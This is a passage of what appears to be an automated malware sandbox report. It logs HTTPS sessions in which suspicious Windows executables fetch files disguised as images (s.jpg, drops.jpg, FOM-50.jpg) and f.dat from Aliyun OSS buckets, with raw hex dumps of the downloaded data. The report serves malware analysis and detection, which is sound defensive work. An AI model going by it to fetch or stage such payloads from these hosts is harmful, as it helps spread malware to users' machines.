e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 Data Ascii: G<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2024-12-24 14:12:41 UTC	160	IN	Data Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 4b 19 a7 39 Data Ascii: VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSK9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	39.103.20.20	443	6664	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:12:43 UTC	111	OUT	GET /s.jpg HTTP/1.1 User-Agent: GetData Host: jx2zg4.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:12:44 UTC	543	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:12:44 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 676AC15C0AD0713132ECBE3F Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Tue, 24 Dec 2024 11:58:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 3
2024-12-24 14:12:44 UTC	3553	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-12-24 14:12:44 UTC	4096	IN	Data Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2024-12-24 14:12:44 UTC	650	IN	Data Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	118.178.60.9	443	6808	C:\Users\user\Documents\WchJz1.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:12:59 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:13:00 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:13:00 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 676AC16CE3B51E343658102F Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 9
2024-12-24 14:13:00 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2024-12-24 14:13:00 UTC	4096	IN	Data Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
2024-12-24 14:13:00 UTC	4096	IN	Data Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5 Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
2024-12-24 14:13:00 UTC	4096	IN	Data Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw98
2024-12-24 14:13:00 UTC	4096	IN	Data Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAqV
2024-12-24 14:13:00 UTC	4096	IN	Data Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2024-12-24 14:13:00 UTC	4096	IN	Data Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3 Data Ascii: ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2024-12-24 14:13:00 UTC	4096	IN	Data Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39 Data Ascii: t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
2024-12-24 14:13:00 UTC	4096	IN	Data Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2024-12-24 14:13:00 UTC	955	IN	Data Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	118.178.60.9	443	6808	C:\Users\user\Documents\WchJz1.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:13:04 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:13:05 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:13:05 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 676AC1712E5F223434802A76 Accept-Ranges: bytes ETag: "E54C4296F011EC91D935AA353C936E34" Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11142793972884948456 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5UxClvAR7JHZNao1PJNuNA== x-oss-server-time: 2
2024-12-24 14:13:05 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49757	118.178.60.9	443	6808	C:\Users\user\Documents\WchJz1.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:13:10 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:13:11 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:13:10 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 676AC176FDF07839326A9D67 Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 8
2024-12-24 14:13:11 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-12-24 14:13:11 UTC	4096	IN	Data Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96 Data Ascii: \|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2024-12-24 14:13:11 UTC	4096	IN	Data Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 